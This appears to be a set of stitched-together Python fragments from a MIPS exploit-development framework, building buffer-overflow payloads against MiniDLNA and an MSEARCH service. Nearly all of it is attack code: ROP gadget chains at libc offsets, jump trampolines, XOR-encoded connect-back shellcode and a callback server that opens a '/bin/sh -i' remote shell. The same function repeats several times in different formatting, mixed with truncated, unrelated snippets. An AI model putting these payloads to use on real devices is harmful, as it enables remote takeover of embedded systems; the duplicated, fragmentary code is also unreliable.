def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
sc = SectionCreator(self.endianness, badchars=badbyte_list)
#Must take into account length if IP addr
#since it's part of the sprintf() that overflows
offset_modifier = self.offset_modifier
sections = self.__class__.minidlna_rop_gadgets(self.offset_modifier,
qemu)
trampoline_1 = Trampoline(self.endianness, -672)
section = sc.string_section(
684 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 672")
sections.append(section)
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = sc.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
sections.append(section)
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
section = sc.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
sections.append(section)
buf = OverflowBuffer(self.endianness,
self.overflow_len,
sections,
logger=self.logger)
return buf
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False):
badbyte_list=['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
sc=SectionCreator(self.endianness,badchars=badbyte_list)
#Must take into account length if IP addr
#since it's part of the sprintf() that overflows
offset_modifier=self.offset_modifier
sections=self.__class__.minidlna_rop_gadgets(self.offset_modifier,qemu)
trampoline_1=Trampoline(self.endianness,-672)
section=sc.string_section(684-offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 672")
sections.append(section)
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2=Trampoline(self.endianness,1028)
section=sc.string_section(16-offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
sections.append(section)
payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port)
if encoder_class:
encoded_payload=encoder_class(payload,badchars=badbyte_list)
payload=encoded_payload
section=sc.string_section(1048-offset_modifier,
payload.shellcode,
description="connect-back payload")
sections.append(section)
buf=OverflowBuffer(self.endianness,self.overflow_len,sections,logger=self.logger)
return buf
call(["./vuln", buf])
jalr $t9
## 000233A0 addiu $a1, $sp, 28
sections.append(section)
section = SC.gadget_section(572, 0x12c320, description="jump to sp pointer, load a1 to t9 "
"and hump")
## 0012C320 move $t9, $a1
## 0012C324 addiu $a0, 0x4C
## 0012C328 jr $t9
## 0012C32C move $a1, $a2
sections.append(section)
payload=ConnectbackPayload("192.168.2.200", LittleEndian)
#XOR encode the payload
encoded_payload=MipsXorEncoder(payload, badchars=badchars)
section=SC.string_section(668, encoded_payload.shellcode, "encoded connect-back payload")
sections.append(section)
buf = OverflowBuffer(LittleEndian, 1024, sections)
f = open('bof', 'w')
f.write(str(buf))
f.close()
################################################################################
#jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg
################################################################################
section=SC.gadget_section(192,
0x1B1F4,
description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.")
connectback_server=ConnectbackServer(CALLBACK_IP,port=8080,startcmd="/bin/sh -i",connectback_shell=True)
payload=ConnectbackPayload(CALLBACK_IP,BigEndian,port=8080)
encoded_payload=MipsXorEncoder(payload,badchars=['\0'])
SC.string_section(268,encoded_payload.shellcode,
description="connect back payload")
buffer_overflow_string=OverflowBuffer(BigEndian,576,SC.section_list)
pretty_msearch=msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string())
print "\n\n"+str(pretty_msearch)+"\n\n"
msearch_string=msearch_crash.MsearchCrash(buffer_overflow_string)
pid=None
if len(sys.argv) > 1:
search_string=sys.argv[1]
if "0x" == search_string[0:2]:
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False):
self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier)
badbyte_list=['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
if self.qemu:
libc=self.libc_qemu
else:
libc=self.libc_actual
offset_modifier=self.offset_modifier
reg_ra=600-offset_modifier
reg_s0=564-offset_modifier
reg_s1=568-offset_modifier
reg_s2=572-offset_modifier
reg_s3=576-offset_modifier
reg_s4=580-offset_modifier
reg_s5=584-offset_modifier
reg_s6=588-offset_modifier
reg_s7=592-offset_modifier
#after rop into fn epilogue
new_reg_ra=640-offset_modifier
new_reg_s0=628-offset_modifier
new_reg_s1=632-offset_modifier
new_reg_s2=636-offset_modifier
SC=SectionCreator(self.endianness,base_address=libc,badchars=badbyte_list)
#0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere
#in libc's text segment
SC.gadget_section(752-offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
SC.gadget_section(768-offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
SC.gadget_section(reg_ra,0x00028028,
description="[ra] load 1 into $a0, jalr $s3")
SC.gadget_section(reg_s2,0x00028028+0x7E88,
description="[s2] readonly placeholder to avoid crashing rop gadget.")
SC.gadget_section(reg_s3,0x0001D95C,
description="[s3] load stack offset into ra, jalr $s1")
SC.gadget_section(reg_s1,0x000506C0,
description="[s1] address of sleep")
SC.gadget_section(new_reg_ra,0x000427A8,
description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6")
SC.gadget_section(reg_s6,0x0000BA84,
description="[s6] jump into stack via $s0")
SC.gadget_section(new_reg_s2,0x00028028,
description="[s2] readonly placeholder to avoid crashing stack finder gadget.")
trampoline_1=Trampoline(self.endianness,-664)
section=SC.string_section(676-offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 664")
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2=Trampoline(self.endianness,1028)
section=SC.string_section(16-offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port)
if encoder_class:
encoded_payload=encoder_class(payload,badchars=badbyte_list)
payload=encoded_payload
#payload has to go at 1048 since trampoline minimum forward jump is
#1028. 1028+trampoline offset+4 = 1048
section=SC.string_section(1048-offset_modifier,
payload.shellcode,
description="connect-back payload")
buf=OverflowBuffer(self.endianness,self.overflow_len,SC.section_list,logger=self.logger)
return buf
def build_overflow(self,
target_ip_address,
encoder_class=None,
qemu=False):
self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier)
badbyte_list = ['\x00']
for k in self.__class__.minidlna_badbytes.keys():
badbyte_list.append(k)
if self.qemu:
libc = self.libc_qemu
else:
libc = self.libc_actual
offset_modifier = self.offset_modifier
reg_ra = 600 - offset_modifier
reg_s0 = 564 - offset_modifier
reg_s1 = 568 - offset_modifier
reg_s2 = 572 - offset_modifier
reg_s3 = 576 - offset_modifier
reg_s4 = 580 - offset_modifier
reg_s5 = 584 - offset_modifier
reg_s6 = 588 - offset_modifier
reg_s7 = 592 - offset_modifier
#after rop into fn epilogue
new_reg_ra = 640 - offset_modifier
new_reg_s0 = 628 - offset_modifier
new_reg_s1 = 632 - offset_modifier
new_reg_s2 = 636 - offset_modifier
SC = SectionCreator(self.endianness,
base_address=libc,
badchars=badbyte_list)
#0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere
#in libc's text segment
SC.gadget_section(
752 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 1 to avoid crashing memcpy.")
SC.gadget_section(
768 - offset_modifier,
0x157BB0BA,
base_address=0,
description="placeholder 2 to avoid crashing memcpy.")
SC.gadget_section(reg_ra,
0x00028028,
description="[ra] load 1 into $a0, jalr $s3")
SC.gadget_section(
reg_s2,
0x00028028 + 0x7E88,
description=
"[s2] readonly placeholder to avoid crashing rop gadget.")
SC.gadget_section(
reg_s3,
0x0001D95C,
description="[s3] load stack offset into ra, jalr $s1")
SC.gadget_section(reg_s1,
0x000506C0,
description="[s1] address of sleep")
SC.gadget_section(
new_reg_ra,
0x000427A8,
description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6")
SC.gadget_section(reg_s6,
0x0000BA84,
description="[s6] jump into stack via $s0")
SC.gadget_section(
new_reg_s2,
0x00028028,
description=
"[s2] readonly placeholder to avoid crashing stack finder gadget.")
trampoline_1 = Trampoline(self.endianness, -664)
section = SC.string_section(
676 - offset_modifier,
trampoline_1.shellcode,
description="First trampoline payload, jump back 664")
#1028, or 0x404, is the smallest operand to MIPS beq that
#can >>2 bits and still have both bytes be non-null
trampoline_2 = Trampoline(self.endianness, 1028)
section = SC.string_section(
16 - offset_modifier,
trampoline_2.shellcode,
description="Second trampoline payload, jump forward 1028 ")
payload = ConnectbackPayload(self.callback_ip_address,
self.endianness,
port=self.port)
if encoder_class:
encoded_payload = encoder_class(payload, badchars=badbyte_list)
payload = encoded_payload
#payload has to go at 1048 since trampoline minimum forward jump is
#1028. 1028+trampoline offset+4 = 1048
section = SC.string_section(1048 - offset_modifier,
payload.shellcode,
description="connect-back payload")
buf = OverflowBuffer(self.endianness,
self.overflow_len,
SC.section_list,
logger=self.logger)
return buf
